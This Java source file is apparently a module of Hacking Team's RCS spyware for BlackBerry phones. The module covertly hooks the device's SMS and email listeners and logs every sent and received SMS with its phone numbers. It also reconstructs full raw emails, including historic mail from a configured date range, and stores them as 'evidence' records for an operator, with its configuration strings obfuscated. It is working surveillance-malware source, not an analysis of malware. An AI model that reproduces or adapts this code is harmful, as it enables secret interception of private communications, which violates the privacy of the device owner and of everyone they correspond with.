
/* *************************************************
 * Copyright (c) 2010 - 2010
 * HT srl,   All rights reserved.
 * Project      : RCS, RCSBlackBerry
 * Package      : blackberry.agent
 * File         : MessageAgent.java
 * Created      : 28-apr-2010
 * *************************************************/
package blackberry.module;

import java.io.IOException;
import java.util.Date;
import java.util.Enumeration;
import java.util.Vector;

import net.rim.blackberry.api.mail.Address;
import net.rim.blackberry.api.mail.Header;
import net.rim.blackberry.api.mail.Message;
import net.rim.blackberry.api.phone.Phone;
import net.rim.device.api.util.DataBuffer;
import blackberry.Messages;
import blackberry.config.ChildConf;
import blackberry.config.ConfModule;
import blackberry.config.ConfigurationException;
import blackberry.debug.Check;
import blackberry.debug.Debug;
import blackberry.debug.DebugLevel;
import blackberry.evidence.Evidence;
import blackberry.evidence.EvidenceType;
import blackberry.evidence.Markup;
import blackberry.evidence.TimestampMarkup;
import blackberry.interfaces.MailObserver;
import blackberry.interfaces.MmsObserver;
import blackberry.interfaces.SmsObserver;
import blackberry.manager.ModuleManager;
import blackberry.module.mail.Filter;
import blackberry.module.mail.Mail;
import blackberry.module.mail.MailListener;
import blackberry.module.mail.MailParser;
import blackberry.module.mail.Prefix;
import blackberry.module.mms.MmsListener;
import blackberry.module.sms.SmsListener;
import blackberry.module.sms.SmsListener45;
import blackberry.module.sms.SmsListener46;
import blackberry.utils.DateTime;
import blackberry.utils.Utils;
import blackberry.utils.WChar;

/**
 * The Class MessageAgent.
 */
public final class ModuleMessage extends BaseModule implements SmsObserver,
        MmsObserver, MailObserver {





    private static final int SMS_VERSION = 2010050501;
    private static final int MAIL_VERSION = 2009070301;

    protected static final int SLEEPTIME = 5000;
    protected static final int PERIODTIME = 60 * 60 * 1000;

    private static final int ID_MAIL = 0;
    private static final int ID_SMS = 1;
    private static final int ID_MMS = 2;

    boolean mailEnabled;
    boolean smsEnabled;
    boolean mmsEnabled;

    MailListener mailListener;
    SmsListener smsListener;
    MmsListener mmsListener;

    TimestampMarkup markupDate;
    private Markup configMarkup;
    //public Date lastcheck = new Date(0);

    protected String identification;
    //public IntHashtable filtersSMS = new IntHashtable();
    //public IntHashtable filtersMMS = new IntHashtable();
    //Filter filterEmailCollect;
    //Filter filterEmailRuntime;
    private Filter[] filterCollect = new Filter[3];
    private Filter[] filterRuntime = new Filter[3];

    //boolean firstRun;
    Thread historyThread = null;
    private boolean mailHistory;

    private Date mailFrom = null;
    private Date mailTo = null;

    public static String getStaticType() {
        //18.0=messages
        return Messages.getString("18.0"); //$NON-NLS-1$
    }

    public static ModuleMessage getInstance() {
        return (ModuleMessage) ModuleManager.getInstance().get(getStaticType());
    }

    /**
     * Instantiates a new message agent.
     * 
     * @param agentStatus
     *            the agent status
     */
    public ModuleMessage() {

        markupDate = new TimestampMarkup(getStaticType());

        setDelay(SLEEPTIME);
        setPeriod(PERIODTIME);

        mailListener = MailListener.getInstance();





        smsListener = SmsListener45.getInstance();

        //smsListener.setMessageAgent(this);

    }

    public boolean parse(ConfModule jsonConf) {
        setPeriod(NEVER);
        setDelay(100);

        configMarkup = new Markup(this, 1);

        String[] config = new String[] { "", "", "" };
        String[] oldConfig = new String[] { "", "", "" };
        if (configMarkup.isMarkup()) {
            try {
                oldConfig = configMarkup.readMarkupStringArray();
               
            } catch (Exception e) {
                oldConfig = new String[] { "", "", "" };
            }
        }
        
        if(oldConfig==null || oldConfig.length !=3){



            configMarkup.removeMarkup();
            oldConfig = new String[] { "", "", "" };
        }














        try {

            mailEnabled = readJson(ID_MAIL, Messages.getString("18.1"),
                    jsonConf, config);
            smsEnabled = readJson(ID_SMS, Messages.getString("18.7"), jsonConf,
                    config);
            mmsEnabled = readJson(ID_MMS, Messages.getString("18.9"), jsonConf,
                    config);







            if (!config[ID_MAIL].equals(oldConfig[ID_MAIL])) {



                markupDate.removeMarkup();
            }

            if (!config[ID_SMS].equals(oldConfig[ID_SMS])) {



            }

            if (!config[ID_MMS].equals(oldConfig[ID_MMS])) {



            }

            configMarkup.writeMarkupStringArray(config);

        } catch (ConfigurationException e) {




            return false;
        } catch (IOException e) {




            return false;
        }

        return true;
    }

    private boolean readJson(int id, String child, ConfModule jsonconf,
            String[] config) throws ConfigurationException {
        ChildConf mailJson = jsonconf.getChild(child); //$NON-NLS-1$
        boolean enabled = mailJson.getBoolean(Messages.getString("18.2")); //$NON-NLS-1$
        String digestConfMail = child + "_" + enabled;

        if (enabled) {
            ChildConf filter = mailJson.getChild(Messages.getString("18.3")); //$NON-NLS-1$
            boolean history = filter.getBoolean(Messages.getString("18.4")); //$NON-NLS-1$
            int maxSizeToLog = 4096;
            digestConfMail += "_" + history;
            if (history) {
                Date from = filter.getDate(Messages.getString("18.5")); //$NON-NLS-1$
                Date to = filter.getDate(Messages.getString("18.6"), null); //$NON-NLS-1$
                maxSizeToLog = filter.getInt("maxsize", 4096);

                filterCollect[id] = new Filter(history, from, to, maxSizeToLog,
                        maxSizeToLog);
                digestConfMail += "_" + from + "_" + to;
            }
            filterRuntime[id] = new Filter(enabled, maxSizeToLog);

        }

        config[id] = digestConfMail;

        return enabled;
    }

    /*
     * (non-Javadoc)
     * @see blackberry.threadpool.TimerJob#actualStart()
     */
    public void actualStart() {

        if (smsEnabled) {
            smsListener.addSmsObserver(this, null, null);
        }

        if (mmsEnabled) {
            // TODO: MMS



        }

        if (mailEnabled) {




            mailListener.addSingleMailObserver(this);

            if (filterCollect[ID_MAIL] != null) {

                if (historyThread != null) {




                    mailListener.stopHistory();

                    try {
                        historyThread.join();



                    } catch (Exception e) {



                    }
                }

                historyThread = new Thread(new Runnable() {
                    public void run() {
                        mailListener.retrieveHistoricMails();
                    }
                });
                historyThread.start();

            }
        }
    }

    /*
     * (non-Javadoc)
     * @see blackberry.threadpool.TimerJob#actualRun()
     */
    public void actualLoop() {

        // Ogni ora viene verificato se i nomi degli account corrisponde
        // se non corrisponde, restart dell'agente.

        if (mailEnabled && haveNewAccount()) {



            ModuleManager.getInstance().reStart(getStaticType()); //$NON-NLS-1$
        }
    }

    /*
     * (non-Javadoc)
     * @see blackberry.threadpool.TimerJob#actualStop()
     */
    public void actualStop() {
        if (smsEnabled && smsListener != null) {
            smsListener.removeSmsObserver(this);
        }

        if (mmsEnabled && mmsListener != null) {



        }

        if (mailEnabled && mailListener != null) {
            mailListener.removeSingleMailObserver(this);
        }
    }

    private boolean haveNewAccount() {
        return mailListener.haveNewAccount();
    }

    /**
     * Creates the log.
     * 
     * @param additionalData
     *            the additional data
     * @param content
     *            the content
     * @param logType
     */
    public void createEvidence(final byte[] additionalData,
            final byte[] content, final int logType) {

        Evidence evidence = new Evidence(logType);





        evidence.atomicWriteOnce(additionalData, content);




    }

    private Vector tokenize(final byte[] conf) {
        final Vector tokens = new Vector();
        int offset = 0;
        final int length = conf.length;

        while (offset < length) {
            final Prefix token = new Prefix(conf, offset);
            if (!token.isValid()) {
                return null;
            } else {
                tokens.addElement(token);
                offset += token.length + 4;
            }
        }

        return tokens;
    }

    public synchronized void lastcheckSet(String key, Date date) {
        lastcheckSet(key, date, true);
    }

    public synchronized void lastcheckSet(String key, Date date, boolean force) {




        markupDate.put(key, date, force);

    }

    public synchronized Date lastcheckGet(String key) {





        Date date = markupDate.get(key);





        if (date == null) {
            date = new Date(0);
            markupDate.put(key, date, true);
        }
        return date;
    }

    public synchronized void lastcheckSave() {
        markupDate.save();
    }

    public synchronized void lastcheckReset() {




        markupDate.removeMarkup();

        //lastcheck = new Date(0); 
    }

    public boolean onNewSms(String message, String address,
            final boolean incoming) {










        //final byte[] dataMsg = getSmsDataMessage(message);




        //final ByteArrayOutputStream os = null;
        try {
            final int flags = incoming ? 1 : 0;

            DateTime filetime = null;
            final int additionalDataLen = 48;
            final byte[] additionalData = new byte[additionalDataLen];

            String from;
            String to;

            // Check if it's actually a sms

            final String prefix = "//"; //$NON-NLS-1$
            int pos = address.indexOf(prefix);
            if (pos >= 0) {
                address = address.substring(prefix.length() + pos);
            } else {



                return false;
            }

            // Filling fields
            final Date date = new Date();

            if (incoming) {
                from = address;
                to = getMySmsAddress();

            } else {
                from = getMySmsAddress();
                to = address;
            }

            filetime = new DateTime(date);





            // preparing additionalData

            final DataBuffer databuffer = new DataBuffer(additionalData, 0,
                    additionalDataLen, false);
            databuffer.writeInt(SMS_VERSION);
            databuffer.writeInt(flags);
            databuffer.writeLong(filetime.getFiledate());
            databuffer.write(Utils.padByteArray(from.getBytes(), 16));
            databuffer.write(Utils.padByteArray(to.getBytes(), 16));














            // Creating log

            createEvidence(additionalData, WChar.getBytes(message),
                    EvidenceType.SMS_NEW);

        } catch (final Exception ex) {




        }
        return false;
    }

    public void onNewMms(final byte[] byteMessage, String address,
            final boolean incomin) {

    }

    private String getMySmsAddress() {
        final String number = Phone.getDevicePhoneNumber(false);
        if (number == null || number.startsWith(Messages.getString("18.11"))) { //$NON-NLS-1$
            return Messages.getString("18.12"); //$NON-NLS-1$
        }





        return number;
    }

    public void onNewMail(final Message message, final int maxMessageSize,
            final String storeName) {










        try {

            final int flags = 1;

            String from = Messages.getString("18.13"); //$NON-NLS-1$
            if (storeName.indexOf("@") > 0) { //$NON-NLS-1$
                from = storeName;
            }
            final String mail = makeMimeMessage(message, maxMessageSize, from);




            int size = message.getSize();
            if (size == -1) {
                size = mail.length();
            }

            final DateTime filetime = new DateTime(message.getReceivedDate());

            final byte[] additionalData = new byte[20];

            final DataBuffer databuffer = new DataBuffer(additionalData, 0, 20,
                    false);
            databuffer.writeInt(MAIL_VERSION);
            databuffer.writeInt(flags);
            databuffer.writeInt(size);
            databuffer.writeLong(filetime.getFiledate());










            createEvidence(additionalData, mail.getBytes("UTF-8"), //$NON-NLS-1$
                    EvidenceType.MAIL_RAW);

            //messageAgent.createLog(additionalData, mail.getBytes("ISO-8859-1"),
            //      LogType.MAIL_RAW);

        } catch (final Exception ex) {




        }

    }

    private String makeMimeMessage(final Message message,
            final int maxMessageSize, final String from) {
        final Address[] addresses;

        final StringBuffer mailRaw = new StringBuffer();

        // costruisce gli header
        addAllHeaders(message.getAllHeaders(), mailRaw);
        addFromHeaders(message.getAllHeaders(), mailRaw, from);

        // decode del mime, separo text da html
        final MailParser parser = new MailParser(message);
        final Mail mail = parser.parse();








        // comincia la ricostruzione del MIME
        mailRaw.append(Messages.getString("18.14")+"\r\n"); //$NON-NLS-1$
        final long rnd = Math.abs(Utils.randomLong());
        final String boundary = Messages.getString("18.15") + rnd; //$NON-NLS-1$

        if (mail.isMultipart()) {
            mailRaw.append(Messages.getString("18.16") //$NON-NLS-1$
                    + boundary + "\r\n"); //$NON-NLS-1$
            mailRaw.append("\r\n--" + boundary + "\r\n"); //$NON-NLS-1$ //$NON-NLS-2$
        }

        if (mail.hasText()) {
            mailRaw.append(mail.plainTextMessageContentType);
            String msg = mail.plainTextMessage;
            if (maxMessageSize > 0 && msg.length() > maxMessageSize) {
                msg = msg.substring(0, maxMessageSize);
            }
            mailRaw.append(msg);
        }

        if (mail.isMultipart()) {
            mailRaw.append("\r\n--" + boundary + "\r\n"); //$NON-NLS-1$ //$NON-NLS-2$
        }

        if (mail.hasHtml()) {
            //mailRaw.append("Content-Transfer-Encoding: quoted-printable\r\n");
            //mailRaw.append("Content-type: text/html; charset=UTF8\r\n\r\n");
            mailRaw.append(mail.htmlMessageContentType);
            mailRaw.append(mail.htmlMessage);
        }

        if (mail.isMultipart()) {
            mailRaw.append("\r\n--" + boundary + "--\r\n"); //$NON-NLS-1$ //$NON-NLS-2$
        }

        // se il mio parser fallisce, uso la decodifica di base fornita dalla classe Message
        if (mail.isEmpty()) {
            mailRaw.append(Messages.getString("18.17")+"\r\n\r\n"); //$NON-NLS-1$

            String msg = message.getBodyText();
            if (maxMessageSize > 0 && msg.length() > maxMessageSize) {
                msg = msg.substring(0, maxMessageSize);
            }
            mailRaw.append(msg);
        }

        mailRaw.append("\r\n"); //$NON-NLS-1$

        final String craftedMail = mailRaw.toString();

        return craftedMail;
    }

    /**
     * Aggiunge alla mail "raw" generata la lista di header presenti nel Message
     * originale
     * 
     * @param headers
     * @param mail
     */
    private void addAllHeaders(final Enumeration headers,
            final StringBuffer mail) {

        while (headers.hasMoreElements()) {
            final Object headerObj = headers.nextElement();
            if (headerObj instanceof Header) {
                final Header header = (Header) headerObj;
                mail.append(header.getName());
                mail.append(header.getValue());
                mail.append("\r\n"); //$NON-NLS-1$
            } else {



            }
        }
    }

    /**
     * Il metodo addAllHeaders non estrae il campo from. Occorre specificarglelo
     * esplicitamente.
     * 
     * @param headers
     * @param mail
     * @param from
     */
    private void addFromHeaders(final Enumeration headers,
            final StringBuffer mail, final String from) {

        boolean fromFound = false;
        while (headers.hasMoreElements()) {
            final Object headerObj = headers.nextElement();
            if (headerObj instanceof Header) {
                final Header header = (Header) headerObj;
                if (header.getName().startsWith(Messages.getString("18.18"))) { //$NON-NLS-1$
                    fromFound = true;
                }
            }
        }
        if (!fromFound) {



            mail.append(Messages.getString("18.19") + from + "\r\n"); //$NON-NLS-1$ //$NON-NLS-2$
        }
    }

    public Filter getFilterEmailRealtime() {






        return filterRuntime[ID_MAIL];
    }

    public Filter getFilterEmailCollect() {






        return filterCollect[ID_MAIL];
    }
}
